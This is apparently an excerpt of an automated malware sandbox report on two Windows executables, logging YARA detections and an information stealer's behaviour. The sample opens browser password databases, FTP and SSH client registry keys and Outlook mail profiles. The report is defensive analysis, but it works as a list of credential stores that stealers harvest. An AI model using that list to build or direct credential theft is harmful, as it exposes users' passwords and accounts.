Source: Yara match File source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sharon38892.exe PID: 2912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XxENUzWteJXT.exe PID: 3472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: XxENUzWteJXT.exe PID: 3796, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sharon38892.exe PID: 3376, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: PopPassword 21_2_0040D069
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe Code function: SmtpPassword 21_2_0040D069
Source: Yara match File source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs